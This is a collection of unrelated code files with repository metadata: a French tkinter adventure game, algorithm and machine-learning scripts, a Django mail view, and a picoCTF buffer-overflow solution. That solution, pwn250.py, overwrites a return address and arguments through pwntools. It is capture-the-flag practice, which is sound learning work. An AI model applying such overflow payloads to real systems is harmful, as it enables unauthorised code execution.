    showinfo('Bien joué !',"Il réussi à accélérer !")
    showinfo('Bien joué !',"Il accélère tellement, qu'il écrase une biche...!")
    showinfo('Bien joué',"Heureusement, elle était jeune, sa voiture n'a rien.")
    showinfo('Bien joué',"La biche est morte, mais son mariage va vivre ! Il a le cadeau, et il rentre à pleine vitesse.")
    # `global` is required: without it this assignment created a local that
    # was discarded, and fin() always printed the default value of `voiture`.
    global voiture
    voiture = "sale"
    suite1a()
def defaite1():
    """Riddle 1 failed: miss the shops and come home empty-handed."""
    showinfo('Dommage !',"Sebastian manque la pedale d'accélération, et appuie sur le frein ! Il se cogne violemment contre le volant qui lache un horrible klaxon !")
    showinfo('Dommage !',"Le klaxon faisait un bruit de piano, il avait été refait par le frère de la femme de Sebastian, il les detestaient tout les deux, lui, et son satané klaxon.")
    showinfo('Dommage !',"Il arrive à la fermeture des magasins, il n'a aucun cadeau à donner, il est dépité et rentre sans cadeau...")
    suite1a()
def suite1a():
    """Aftermath of the shopping branch: Sophia is found dead (game over)."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)
    lab = Label(menu, fg='black', text = "-Il est devant la porte de sa maison-", font=("arial", 10 , "bold italic"))
    lab.pack()
    showinfo('Vers la maison',"Il arrive pile à l'heure convenu, avec un visage qui ne transmettait aucun stress. Sa principal qualité à toujours été sa pokerface.")
    showinfo('Un tragic incident',"Il entre dans son salon, un silence de plomb lui faisait face, pas un bonjour, et une odeur ferrique planait.")
    showinfo('Un tragic incident',"Sa femme gisait dans le salon ! Elle était morte, poignardé au niveau du coeur ! Vous êtes arrivé, malgrès vos efforts, trop tard pour la sauver.")
    showwarning('FIN',"GAME OVER")
    encore()
def maison():
    """House branch: surprise a burglar and face riddle 1 (combat version)."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)  # keep the window from resizing to its contents
    lab = Label(menu, fg='black', text= "-Vous êtes dans votre maison-", font=("arial", 10, "bold italic"))
    lab.pack()
    showinfo('Maison',"Vous décidez d'aller chez vous.")
    showinfo('Maison',"Sébastian entre lentement chez lui.")
    showinfo('Maison',"Avec un visage de fer, il s'avance vers le salon.")
    showinfo('Maison',"Un homme vêtu complètement en noir et armé d'une dague est sur son flanc droit.")
    showinfo('Maison',"Il attaque !")
    showwarning('Maison',"Résolvez cette énigme pour riposter rapidement !")
    # The riddle opens in its own top-level window.
    Enigme1b = Tk()
    Enigme1b.title("Enigme 1")
    frame = Frame(Enigme1b, bg="ivory", borderwidth=2)
    frame.pack(side=TOP, padx=5, pady=5)
    Label(frame,width = 40, height = 5, fg = 'red', text='Laquelle, parmis ces lettres, est un chiffre romain ?',bg="ivory", font =("arial",30, "bold italic")).pack(padx=5, pady=5)
    Button(Enigme1b,width = 10, height = 5, text ='5',font=(1000000), command=defaite1b).pack(side=LEFT, padx=5, pady=5)
    Button(Enigme1b,width = 10, height =5, text ='F',font=(1000000),command=defaite1b).pack(side=RIGHT, padx=5, pady=5)
    Button(Enigme1b, width = 10, height =5, text = 'C', font =(100000), command=reussi1b).pack(padx=5, pady=5)
def reussi1b():
    """Combat riddle solved: win the fist fight, record the result."""
    showinfo('Bien joué !',"Il réussi à contrer !")
    showinfo('Bien joué !',"Il aligne une série de coups de poing au visage du cambrioleur !")
    showinfo('Bien joué',"Le cambrioleur se battait étrangement bien, mais un uppercut et un coup de coude asséné par Sebastian et il fut au sol !")
    showinfo('Bien joué',"Il est victorieux !")
    # `global` is required so the result reaches the summary printed by fin();
    # without it the assignment only created a discarded local.
    global combat
    combat = "gagné"
    suite1ba()
def defaite1b():
    """Combat riddle failed: take a poisoned dagger hit, record the loss."""
    showinfo('Dommage !',"Il ne réussi pas à contrer !")
    showinfo('Dommage !',"Il prend un coup de poing au visage, et prend un coup de dague à l'épaule droite !")
    showinfo('Dommage !',"Il tombe à genoux devant le cambrioleur !")
    # `global` is required so the loss reaches the summary printed by fin();
    # without it the assignment only created a discarded local and fin()
    # always reported the default "gagné".
    global combat
    combat = "perdu"
    suite1bb()
def suite1bb():
    """Lost-fight ending: paralysed and killed (game over)."""
    showinfo('La douleur',"La dague était empoisonnée ! Il est paralysé !")
    showinfo('La douleur',"Il entend des bruits de pas derrière lui.")
    showinfo('La douleur',"Dès qu'ils s'arrêtent, deux mains empoignent sa tête...")
    showinfo('La douleur',"Une au niveau de sa tête, une autre au niveau de son menton...")
    showinfo('La douleur',"Sa nuque est violemment cassée, il meurt sur le coup, et sa femme suivra aussi rapidement...")
    showwarning('FIN',"GAME OVER")
    encore()
def suite1ba():
    """Won-fight ending: ambushed by the accomplice anyway (game over).

    Fixes two calls that were missing the comma between title and message
    (`showinfo('Cependant..'"…")` and `showwarning('FIN'"GAME OVER")`):
    Python silently concatenated the literals, so the whole text ended up as
    the dialog *title* with an empty body, unlike every other call here.
    """
    showinfo('Cependant..',"Il se relève en pleine forme...")
    showinfo('Cependant..',"Mais il sent une main sur son épaule gauche.")
    showinfo('Cependant..',"Il est frappé par une bouteille de whisky qui se casse sur son crâne !")
    showinfo('Cependant..',"Il tombe au sol, et il voit son agresseur : Le complice du premier cambrioleur.")
    showinfo('Cependant..',"Le premier cambrioleur se relève, dague toujours à la main, et plante violemment Sebastian dans la jugulaire.")
    showinfo('Cependant..',"Il meurt lentement, et il entend les cris de sa femme, dans sa chambre, qui elle aussi se fait égorgé.")
    showwarning('FIN',"GAME OVER")
    encore()
def encore():
    """After a game over, rebuild the welcome screen (Left key replays)."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)  # keep the window from resizing to its contents
    lab = Label(menu, fg='black', text= "-Synopsis-", font=("arial", 10, "bold italic"))
    lab.pack()
    text = Label(menu,width=10,height=5, fg='red', text= "Bienvenue", font=("arial", 50, "bold italic"))
    text.pack()
    contin = Label(menu,width = 50, height = 5, text = "appuyez sur la flèche gauche pour continuer", font=("arial",10,"bold italic"))
    contin.pack(side = BOTTOM)
    text.focus_set()
    text.bind("<Key>", clavier)
def bientotlafin():
    """Add the button labelled '5' that triggers the true ending (fin)."""
    Button(menu,width = 10, height = 5, text ='5',font=(1000000), command=fin).pack(side=LEFT, padx=5, pady=5)
def fin():
    """Play the true ending: Sophia's reveal, the run summary and the credits.

    Prints the module-level state (`voiture`, `combat`, `qui`) accumulated
    during the playthrough to the console as the run summary.
    """
    showinfo('..',"...")
    showerror('...',"Tu dois te demander qui je suis ?")
    showerror('..',"Qui te pousse à continuer chaque soir, à sauver ta femme ?")
    showerror('..',"Qui te demande de <<recommencer>> ce jeu chaque soir ?")
    showerror('..',"Où qui te rappel à chaque fois les règles du jeu dont tu connais toi même les règles ?")
    showerror('..',"C'est moi... Sophia.")
    showinfo('Sophia',"Enfin, la <<Sophia>> que tu as créé.")
    showinfo('Sophia',"Tu dois t'en douté ; Je sais qu'en de nombreuses reprises, tu as tenté de me sauvé")
    showinfo('Sohpia',"Sans succès.")
    print("Tu es rentré avec une voiture.", voiture)
    print("Tu as", combat, "contre des cambrioleurs")
    print("tu as été un", qui)
    showinfo('Sophia',"Et bien sûr, tu m'as vu mourrir plusieurs fois, oui, tout cela je m'en souviens.")
    showinfo('Sophia',"...Quoi ?")
    showinfo('Sophia',"Tu veux toujours me sauver ?")
    showinfo('Sophia',"Tu veux recommencer ?")
    showinfo('Sophia',"S'il y a une personne à sauver, c'est toi Sébastian.")
    showerror('Sophia',"Car cela fait déjà bien longtemps que je suis morte.")
    showerror('Sohia',"Morte dans la même voiture avec laquelle tu rentres chaque soir.")
    showerror('Sophia',"La même voitre qui te fais croire encore et encore, chaque soir, que c'est l'anniversaire de notre mariage.")
    showerror('Sophia',"Et qu'en changeant constemment de comportement, tu réussiras à me sauver.")
    showinfo('Sophia',"Mais c'est fini Sébastian, l'illusion s'estompe. Il est temps pour toi de te réveiller de ce jeu tardif, le matin t'attends...")
    showinfo('Sophia',"Je t'aime, Sébastian.")
    showinfo('...',"...")
    showinfo('...',"..")
    showinfo('...',".")
    showinfo("L'aube d'un nouveau jour","Sébastian se reveille, une bouteille de vin à la main.")
    showinfo("L'aube d'un nouveau jour","Il n'a jamais été aussi fatigué, sa gueule de bois est tellement grande qu'il ne peut pas se relever du canapé où il est assis.")
    showinfo("L'aube d'un nouveau jour","Il appelle Sophia, encore et encore, une fois de manière colérique, une autre fois en sanglottant.")
    showinfo("L'aube d'un nouveau jour","Mais il n'y a aucune réponse...")
    showinfo("L'aube d'un nouveau jour","Le jeu tardif est fini sans objectif, il n'y a plus de jeu, sans jeu, il faut retourner travailler")
    showinfo("L'aube d'un nouveau jour","C'est comme cela que Sébastian, rémettant son insigne de policier repartait au travail, confiant, sûr que ce jour marquerait une nouvelle page de sa vie : Un jour lumineux...")
    showinfo('FIN',"FIN, MERCI D'AVOIR JOUER JUSQU'AU BOUT ! CE PROJET NOUS A PRIT BEAUCOUP DE TEMPS ET DE PASSION !!!")
    showinfo('FIN',"Deux membres du staff sont partis en dépression quand on leur a dit qu'il fallait aller chercher sur internet pour trouver le moyen de faire une interface graphique")
    showinfo('Fin',"Les autres ont tous démissionné.. Il ne restait donc que deux personnes..Dépressives, autant dire que c'était pas facile !")
    showinfo('Fin',"Jeu fait par -Ohm et Phoenix- (Omairt et Eric)")
# TODO (translated from the original French note): add the first death for the
# direct-house choice; for suite1a and suite1b, end each def with an "encore"
# call that brings both back to the main "Bienvenue" menu.
def bienjoué() :
    """Tutorial quiz: correct answer — congratulate, then start the game."""
    showwarning('Tutorial',"Bien joué ! Vous avez un QI supérieur à 5, ça va vous être utile")
    lejeuvacommencer()
def décevant() :
    """Tutorial quiz: wrong answer — tease the player, then start anyway."""
    showwarning('Tutorial',"...Je vais supposer que vous l'avez fait exprès")
    lejeuvacommencer()
def continuer() :
    """Show the tutorial: explain the puzzle mechanic with a sample question."""
    showwarning('tutorial',"Ce jeu est une histoire interactive. Pour réaliser certaines action, le jeu va parfois vous demander de résoudre un puzzle")
    showwarning('tutorial',"Prenons un exemple simple :")
    # The sample puzzle opens in its own top-level window.
    Tuto = Tk()
    Tuto.title('A night game - fenêtre tutorial')
    frame = Frame(Tuto, bg="ivory", borderwidth=2)
    frame.pack(side=TOP, padx=5, pady=5)
    Label(frame,width = 17, height = 5, fg = 'red', text="Combien fait 2 x 2 ? ",bg="ivory", font =("arial",50, "bold italic")).pack(padx=5, pady=5)
    Button(Tuto,width = 10, height = 5, text ='4',font=(1000000), command=bienjoué).pack(side=LEFT, padx=5, pady=5)
    Button(Tuto,width = 10, height =5, text ='6',font=(1000000),command=décevant).pack(side=RIGHT, padx=5, pady=5)
# Definition of the menu actions.
def commencer():
    """Start prompt: yes goes to the tutorial, no gets asked again."""
    if askyesno('le début', 'Voulez-vous vraiment commencer ?') :
        showwarning('le début', 'Allons-y...')
        continuer()
    else :
        # NOTE(review): the a==1 guard is always true right after a=1, so the
        # "no" answer unconditionally leads to interrogation().
        a = 1
        if a == 1 :
            interrogation()
def interrogation() :
    """Second start prompt: either answer ends up in the tutorial."""
    if askyesno('le début', '....Vous voulez dire oui ?') :
        showwarning('le début', 'Bien.')
        continuer()
    else :
        showwarning('le début', 'Le choix ne vous appartient pas.')
        continuer()
def interdiction():
    """Refuse the Down key on the welcome screen."""
    showwarning('Non',"Le choix ne vous appartient pas, commencez...")
# Note (translated): each dialog window could easily be destroyed after use,
# but doing so made the page buggy — the heavy program overloads the quit
# command, which ends up jamming.
def lejeuvacommencer():
showwarning('Warning',"Attention, il est necessaire de fermer chaque fenêtre après avoir fini la question, pour ne pas se retrouver surchargé de fenêtre, cherchez toujours à fermer la fenetre après avoir résolu une énigme, c'est important.")
showwarning('Warning',"Echouer une énigme peut se révéler sans conséquences, mais peut aussi avoir un effet négatif sur votre progression dans le jeu, faites les donc le plus sérieusement possible.")
showwarning('Warning', "Sur ce, le jeu va commencer. Merci de votre patience : elle ne sera pas récompensé, au contraire.")
entrer()
photo = PhotoImage(file="A night game continuation du menu.gif")
canvas = Canvas(menu, width =839, height=533)
canvas.create_image(0, 0, anchor=NW, image=photo)
canvas.focus_set()
canvas.bind("<Key>", clavier)
canvas.pack()
menu.mainloop()
| [
"noreply@github.com"
] | noreply@github.com |
1464ca6d44baf915444d9dad3ecc767fdff28e0e | dffd7156da8b71f4a743ec77d05c8ba031988508 | /ac/abc154/abc154_b/9971915.py | c5baf251f913ab6f70b442a7456aca0f26f2032a | [] | no_license | e1810/kyopro | a3a9a2ee63bc178dfa110788745a208dead37da6 | 15cf27d9ecc70cf6d82212ca0c788e327371b2dd | refs/heads/master | 2021-11-10T16:53:23.246374 | 2021-02-06T16:29:09 | 2021-10-31T06:20:50 | 252,388,049 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25 | py |
print("x"*len(input()))
| [
"v.iceele1810@gmail.com"
] | v.iceele1810@gmail.com |
cb1810bfd5b85a39824367a9ea617e958eb2a01c | 5428106b0e4f385d4f4604539ca4c22f092b84ac | /picoCTF2019/pwn250/pwn250.py | a6b1cb4711c708aac33d8be72027522a8488281c | [] | no_license | danbrodsky/ctf | ced190d78d6259a71e70d698f803d8e743c85f9b | d56d42d65a35be84f10fa4cfb3ac2474a4b72cfc | refs/heads/master | 2021-07-08T02:17:25.753376 | 2020-12-30T05:44:03 | 2020-12-30T09:34:40 | 214,593,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | from pwn import *
# p = process('/problems/overflow-2_0_f4d7b52433d7aa96e72a63fdd5dcc9cc/vuln')
p = process('./vuln')
p.sendline('A'*188 + p32(0x80485e6) + 'a'*4 + p32(0xDEADBEEF) + p32(0xC0DED00D))
print p.recvall()
# print('A'*188 + p32(0x80485e6) + p32(0xDEADBEEF) + p32(0xC0DED00D))
# p.interactive()
| [
"d6brodsky@gmail.com"
] | d6brodsky@gmail.com |
163036a0922e097b9dee10af3986213a2f6e9248 | 15fa43735d620b87a823f817dadb71ffd75bbef1 | /Graph Theory/dijkstra.py | f755626aaeb9f3c6f8a3ed7a11863d8fd79d3b87 | [] | no_license | endianscript/HackerRank | 493f894208f43454b276ddbed439eab2a3f3db50 | 63c70fea45a50690cd108f3c28774b9329c918ed | refs/heads/master | 2021-01-11T05:45:08.501096 | 2016-10-12T20:27:17 | 2016-10-12T20:27:17 | 69,412,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,379 | py | import sys
import collections
from functools import total_ordering
class UndirectedGraphAM:
def __init__(self):
self.vertices = {}
def add_edge(self,u,v,weight=0):
edge_exists = False
if u not in self.vertices:
self.vertices[u] = {}
else:
if v in self.vertices[u]:
current_weight = self.vertices[u][v]
edge_exists = True
if edge_exists:
if weight < current_weight:
self.vertices[u][v] = weight
else:
self.vertices[u][v] = weight
if v not in self.vertices:
self.vertices[v] = {}
else:
if u in self.vertices[v]:
current_weight = self.vertices[v][u]
if edge_exists:
if weight < current_weight:
self.vertices[v][u] = weight
else:
self.vertices[v][u] = weight
def neighbours(self, u):
if u in self.vertices:
for i in self.vertices[u]:
yield i
def get_vertices(self):
for i in self.vertices:
yield i
def get_weight(self, u,v):
if u in self.vertices:
if v in self.vertices[u]:
return self.vertices[u][v]
def __repr__(self):
rep = "Graph: { "
for u in self.vertices:
rep += str(u) + ":"
for v in self.vertices[u]:
rep +="(" +str(v)
if self.vertices[u][v]:
rep+= ","+str(self.vertices[u][v])+") "
else:
rep+="), "
return rep + "}"
class MinHeap:
def __init__(self):
self.heap = [0]
self.currentsize = 0
self.node_position_map = {}
def insert(self, node):
self.heap.append(node)
self.currentsize = self.currentsize + 1
self.node_position_map[node.key] = self.currentsize
self.percolate_up(self.currentsize)
def percolate_up(self,current_position):
while current_position // 2 > 0:
if self.heap[current_position] < self.heap[current_position // 2]:
self.swap(current_position,current_position // 2)
current_position = current_position // 2
def swap(self, child_position, parent_position):
child_node = self.heap[child_position]
parent_node = self.heap[parent_position]
self.node_position_map[child_node.key] = parent_position
self.node_position_map[parent_node.key] = child_position
self.heap[parent_position], self.heap[child_position] = self.heap[child_position], self.heap[parent_position]
def extract_min(self):
minval = self.heap[1]
del self.node_position_map[minval.key]
self.heap[1] = self.heap[self.currentsize]
self.node_position_map[self.heap[1].key] = 1
self.heap.pop()
self.currentsize = self.currentsize - 1
self.percolate_down(1)
return minval
def percolate_down(self, position):
while position*2 <= self.currentsize:
min_child_position = self.get_min_child_position(position)
if self.heap[position] > self.heap[min_child_position]:
self.swap(position, min_child_position)
position = min_child_position
def get_min_child_position(self, position):
if (position * 2 + 1) > self.currentsize:
return position * 2
else:
if self.heap[position * 2] < self.heap[position * 2 + 1]:
return position * 2
else:
return position * 2 + 1
def decrease_key(self, key, value):
if key in self.node_position_map:
position = self.node_position_map[key]
self.heap[position] = HeapNode(key, value)
self.percolate_up(position)
def is_empty(self):
return True if self.currentsize == 0 else False
def __getitem__(self, key):
position = self.node_position_map[key]
return self.heap[position]
def __contains__(self, item):
return True if item in self.node_position_map else False
@total_ordering
class HeapNode:
def __init__(self,key,value):
self.key = key
self.value = value
def __gt__(self, other):
return True if self.value > other.value else False
def __repr__(self):
return "("+str(self.key)+", "+str(self.value)+")"
def dijkstras_algorithm(graph, start_vertex):
heap = MinHeap()
vertex_distance_map = {}
vertex_parent_path = {}
for vertex in graph.get_vertices():
heap.insert(HeapNode(vertex, sys.maxsize))
vertex_distance_map[vertex] = sys.maxsize
heap.decrease_key(start_vertex, 0)
vertex_distance_map[start_vertex] = 0
vertex_parent_path[start_vertex] = None
while not heap.is_empty():
current_vertex = heap.extract_min()
for next_vertex in graph.neighbours(current_vertex.key):
if next_vertex in heap:
new_cost = vertex_distance_map[current_vertex.key] + graph.get_weight(current_vertex.key,next_vertex)
current_cost = heap[next_vertex].value
if new_cost < current_cost:
vertex_distance_map[next_vertex] = new_cost
vertex_parent_path[next_vertex] = current_vertex.key
heap.decrease_key(next_vertex, new_cost)
return vertex_distance_map
if __name__=='__main__':
#file_input = 'dijkstra2_input.txt'
#with open(file_input,'r+') as fobj:
num_of_testcases = int(input().strip())
for i in range(num_of_testcases):
graph = UndirectedGraphAM()
vertex, edges = (int(i) for i in input().strip().split(" "))
for i in range(edges):
u, v, weight = (int(i) for i in input().strip().split(" "))
graph.add_edge(u, v, weight)
start_vertex = int(input().strip())
result = dijkstras_algorithm(graph, start_vertex)
od = collections.OrderedDict(sorted(result.items()))
for i in range(1,vertex+1):
if i != start_vertex:
if i in od and od[i] != sys.maxsize:
print(od[i], end = " ")
else:
print(-1, end = " ")
print()
| [
"endianscript@gmail.com"
] | endianscript@gmail.com |
8b5034a5ccb77ac0bd4e8067f44ce7262bb7a28f | 713ae0f3f54f8fcfae796a46b3c307c329e0818f | /mailing/views.py | a683a30e32851f44fda1878d419f5456bbc6508b | [] | no_license | MartinStevko/mailing | 68396e0a015823de7ad3c1be7db3cdfd6f8b375c | 1aff64f1ef6e7232f8a7591f445c6818006df399 | refs/heads/master | 2020-03-29T12:40:52.166485 | 2018-09-24T17:41:56 | 2018-09-24T17:41:56 | 149,912,131 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | from django.shortcuts import render, redirect
from django.views import View
from django.conf import settings
from django.core.mail import send_mail
from .models import *
class MailView(View):
template = 'mailing/index.html'
def get(self, request):
send_mail(
'Testovanie mailingu',
'Ak tato sprava dojde, bude to fest dobre, lebo mailing mi zatial nikdy nesiel... :(',
settings.EMAIL_HOST_USER,
['mstevko10@gmail.com'],
fail_silently=False
)
return render(request, self.template)
| [
"mstevko10@gmail.com"
] | mstevko10@gmail.com |
8852a16d08a5a003bc41bff9adedcf3cc48f8f8d | ec34cd789c188573987741d478addc3c4a576f22 | /BIOMD0000000500/model.py | 11dfd41813aa524d632ef5d5903df4221ed7bffd | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | biomodels/BIOMD0000000500 | 49362f1fffbb49e07d8077a5aab81e3ec7072ab5 | 2e28e1c78e37f1bdb716300a0bf902c6e8a0056e | refs/heads/master | 2018-12-31T19:25:22.954078 | 2014-10-16T05:27:55 | 2014-10-16T05:27:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | import os
path = os.path.dirname(os.path.realpath(__file__))
sbmlFilePath = os.path.join(path, 'BIOMD0000000500.xml')
with open(sbmlFilePath,'r') as f:
sbmlString = f.read()
def module_exists(module_name):
try:
__import__(module_name)
except ImportError:
return False
else:
return True
if module_exists('libsbml'):
import libsbml
sbml = libsbml.readSBMLFromString(sbmlString) | [
"stanleygu@gmail.com"
] | stanleygu@gmail.com |
6e2124708a83e98ff77c0a59c40e0542ef09c006 | ea5bc4fedbc076ce20fc51b0a6c0a231b1301fc0 | /tests/test_topchef_client_end_to_end.py | 8205f191f3715f810b426de384416170c960fbf3 | [] | no_license | TopChef/NMRClient | 57f1c692014291aebcd6febf30d8f5d1bb4d8ec7 | 40d1ae3f6bc585ef3707c01f46d8bfbe576bd279 | refs/heads/master | 2020-09-18T19:14:38.566893 | 2016-09-06T17:27:45 | 2016-09-06T17:27:45 | 67,529,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | import sys
import time
LIBRARY_PATH = '/opt/topspin/exp/stan/nmr/py/user'
sys.path.append(LIBRARY_PATH)
from topchef_client import NetworkManager
from topchef_client import TopChefService
True = "1"
False = "0"
server_address = 'http://192.168.1.216/dev'
adder_service_id = '1cb40868-101f-11d9-9a55-000cf18a2ce6'
network = NetworkManager(server_address)
service = TopChefService(adder_service_id, network)
assert (service.has_timed_out() == False)
parameters = {'value': 10}
job = service.request_job(parameters)
result = service.get_result_for_job(job, polling_interval=5, timeout=30)
MSG(str(result))
| [
"michalkononenko@gmail.com"
] | michalkononenko@gmail.com |
4855cc6db5beeeab58411c7ee41b8ec74176101c | d97fd9c0cb920a10c86d420f02e9731a40aa7a43 | /EX1_MLP.py | fe62fe4cc04d9ba43d7948bf4c6d279bd5500c53 | [] | no_license | tejareddy8888/Language-Classification-on-Twitter-Tweets- | fe84a4be9ca11469687277f54328303bfd38a744 | f2b0606bdc0f364b9b8d0873288d4325e6d1346b | refs/heads/master | 2021-01-04T05:17:48.690624 | 2020-02-14T01:43:28 | 2020-02-14T01:43:28 | 240,403,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,044 | py |
from __future__ import division, print_function, unicode_literals
import numpy as np
import os
import matplotlib as mpl
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import SGDClassifier
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neural_network import MLPClassifier
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV
# # Taking the data input and then merge them
workspace_path = r'C:\Users\Govur\Documents\Class\uzh\Fall_2019\Machine Learning for NLP\exercises\exercise_1'
file_path = os.path.join(workspace_path, "labels-train+dev.tsv")
train_df = pd.read_csv(file_path, sep = '\t' , encoding = 'utf-8',header=None,names=['Label','TweetID'])
#train_df.info()
file_path = os.path.join(workspace_path, "labels-test.tsv")
test_df = pd.read_csv(file_path, sep = '\t' , encoding = 'utf-8',header=None,names=['Label','TweetID'])
#test_df.head()
file_path = os.path.join(workspace_path, "tweets.json")
tweets_df = pd.read_json(file_path,encoding = 'utf-8',orient = 'values',dtype='int64',lines=True)
tweets_df.rename(columns={0: "TweetID", 1: "Tweets"}, inplace=True)
#tweets_df.info()
train_df = pd.merge(train_df, tweets_df, on='TweetID')
test_df = pd.merge(test_df, tweets_df, on='TweetID')
Opt_train_df= train_df.groupby('Label').filter(lambda x : len(x)>10)
print(Opt_train_df['Label'].nunique())
Opt_train_df.reset_index(inplace=True)
Opt_test_df = test_df[test_df['Label'].isin(Opt_train_df['Label'])]
print(Opt_test_df['Label'].nunique())
Opt_test_df.reset_index(inplace=True)
split = StratifiedShuffleSplit(n_splits=1, test_size=0.1,train_size=0.9 ,random_state=19)
for train_index, test_index in split.split(Opt_train_df, Opt_train_df["Label"]):
strat_train_set = Opt_train_df.loc[train_index]
strat_test_set = Opt_train_df.loc[test_index]
x_trainingtweet = Opt_train_df.Tweets
y_trainingtweet = Opt_train_df.Label
x_trainingtweet_dev = strat_train_set.Tweets.astype('str')
y_trainingtweet_dev = strat_train_set.Label.astype('str')
x_trainingtweet_val = strat_test_set.Tweets.astype('str')
y_trainingtweet_val = strat_test_set.Label.astype('str')
x_testingtweet = Opt_test_df.Tweets
y_testingtweet = Opt_test_df.Label
label_encoder = LabelEncoder()
y_dev_trainingtweet = label_encoder.fit_transform(y_trainingtweet_dev)
y_val_trainingtweet = label_encoder.transform(y_trainingtweet_val)
y_testingtweet = label_encoder.transform(y_testingtweet)
text_mlp = Pipeline([('vect', CountVectorizer(ngram_range=(1,3),analyzer='char_wb')),('tfidf', TfidfTransformer(smooth_idf=True)),('mlp_clf', MLPClassifier(hidden_layer_sizes=(100,7),max_iter=100,learning_rate='adaptive',learning_rate_init=0.004))])
text_mlp.fit(x_trainingtweet_dev, y_dev_trainingtweet)
mlp_scores = text_mlp.score(x_testingtweet, y_testingtweet)
print('Accuracy of Development set size is %.6f'%text_mlp.score(x_trainingtweet_dev, y_dev_trainingtweet))
print('Accuracy of validation set size is %.6f'%text_mlp.score(x_trainingtweet_val, y_val_trainingtweet))
print('Accuracy of Test set size is %.6f'%mlp_scores)
from sklearn.metrics import precision_score, recall_score, f1_score, confusion_matrix
print(f1_score(y_testingtweet,text_mlp.predict(x_testingtweet), average='weighted'))
conf_mx = confusion_matrix(y_testingtweet,text_mlp.predict(x_testingtweet))
conf_mx
import matplotlib.pyplot as plt
plt.matshow(conf_mx, cmap=plt.cm.gray)
plt.show()
row_sums = conf_mx.sum(axis=1, keepdims=True)
norm_conf_mx = conf_mx / row_sums
np.fill_diagonal(norm_conf_mx, 0)
plt.matshow(norm_conf_mx, cmap=plt.cm.gray)
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
d060ae03bafd519e0887b2a4bc2d04c63345c116 | 95e5da0f1b811e8f3e5a964ed3efc55e927b0c60 | /knn.py | 06d5f489153a04654901c8f5d46f3c0ef7727172 | [] | no_license | delta9874/ML-practice | 40dfbb089fa1fc39c323c12aaaf3655f2ba55d3c | 657dee66302516479c0dc73259c4f04f6e5e45bd | refs/heads/master | 2020-06-18T20:42:28.696737 | 2019-07-11T17:46:26 | 2019-07-11T17:46:26 | 196,440,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,976 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 13 15:05:49 2019
@author: delta
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import model_selection
from sklearn import metrics
from sklearn import ensemble
from datetime import datetime
from sklearn.preprocessing import StandardScaler
from sklearn import utils
from sklearn import neighbors
from sklearn import preprocessing
df=pd.read_csv("/home/delta/dataset/startups.csv")
df.info()
df.rename(columns={"R&D Spend":"rs","Administration":"adm","Marketing Spend":"ms"},inplace=True)
df.info()
######label encoding
state_encoder=preprocessing.LabelEncoder()
df["enc_state"]=state_encoder.fit_transform(df["State"])
df["enc_state"]
################
df.head()
df.drop("State",axis=1,inplace=True)
df.info()
X=df.drop("Profit",axis=1)
y=df["Profit"]
Xtrain,Xtest,ytrain,ytest=model_selection.train_test_split(X,y,test_size=0.15,random_state=42)
Xtrain.info()
knnmodel=neighbors.KNeighborsRegressor(n_neighbors=11)
knnmodel.fit(Xtrain,ytrain)
#fit doesnt create model ,but it create a data structure which help us to search easier
#kdtree
#balltree
#brute
#alogorithm="........."
prediction=knnmodel.predict(Xtest)
print(np.sqrt(metrics.mean_squared_error(ytest,prediction)))
X[:3]
#standard scaling
avg=df.rs.mean()
sd=df.rs.std()
t=(df.rs-avg)/sd
t[:3]
#min max scaling
#robust scaling-used in case of outlairs,is not affected by outlairs
colnames=X.columns.values
rb_scaler=preprocessing.RobustScaler()
X_scaled=rb_scaler.fit_transform(X)
X_scaled[:3]#return a numpy array
X_Sc=pd.DataFrame(X_scaled,columns=colnames)
Xtrain,Xtest,ytrain,ytest=model_selection.train_test_split(X_Sc,y,test_size=0.15,random_state=42)
Xtrain.info()
knnmodel=neighbors.KNeighborsRegressor(n_neighbors=11)
knnmodel.fit(Xtrain,ytrain)
prediction=knnmodel.predict(Xtest)
print(np.sqrt(metrics.mean_squared_error(ytest,prediction)))
| [
"noreply@github.com"
] | noreply@github.com |
619937df9bc5ad69bb41fd822a6d57377e711e63 | d659fb0db310793b918640fdb673b9bd755578bc | /third_party/text_analysis.py | 77b623298203a576c583c2364375d44483e1c9d1 | [
"MIT"
] | permissive | astuk/python-snippets | 562bdcdb23c537650a767fb0369388d9530a67ae | 212f63f820b6f5842f74913ed08da18d41dfe7a4 | refs/heads/master | 2023-06-18T04:29:48.111537 | 2021-07-14T10:55:59 | 2021-07-14T10:55:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | from pathlib import Path
from textblob import TextBlob
path = Path("src/text.txt")
with open(path) as f:
text = f.read()
blob = TextBlob(text)
for sentence in blob.sentences:
print(sentence.sentiment.polarity)
| [
"f2dahlitz@freenet.de"
] | f2dahlitz@freenet.de |
